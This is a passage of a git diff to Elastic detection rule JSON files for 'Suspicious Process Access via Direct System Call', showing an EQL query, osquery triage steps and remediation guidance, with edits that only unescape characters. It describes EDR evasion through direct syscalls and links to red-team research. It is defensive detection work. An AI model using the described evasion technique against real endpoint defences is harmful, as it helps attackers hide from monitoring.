being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) > 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", "references": [ "https://twitter.com/SBousseaden/status/1278013896440324096", "https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs" @@ -53,7 +53,7 @@ ], "risk_score": 73, "rule_id": "2dd480be-1263-4d9c-8672-172928f6789a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_208.json b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_208.json index 80272cc3264..f8fee309f4e 100644 --- a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_208.json +++ b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_208.json @@ -12,8 +12,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Process Access via Direct System Call", - "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) \u003e 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) > 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", "references": [ "https://twitter.com/SBousseaden/status/1278013896440324096", "https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs" @@ -53,7 +53,7 @@ ], "risk_score": 73, "rule_id": "2dd480be-1263-4d9c-8672-172928f6789a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_209.json b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_209.json index 5c9090ca04d..a8c664cb60e 100644 --- a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_209.json +++ b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_209.json @@ -12,8 +12,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Process Access via Direct System Call", - "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) \u003e 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) > 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", "references": [ "https://twitter.com/SBousseaden/status/1278013896440324096", "https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs" @@ -53,7 +53,7 @@ ], "risk_score": 73, "rule_id": "2dd480be-1263-4d9c-8672-172928f6789a", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE 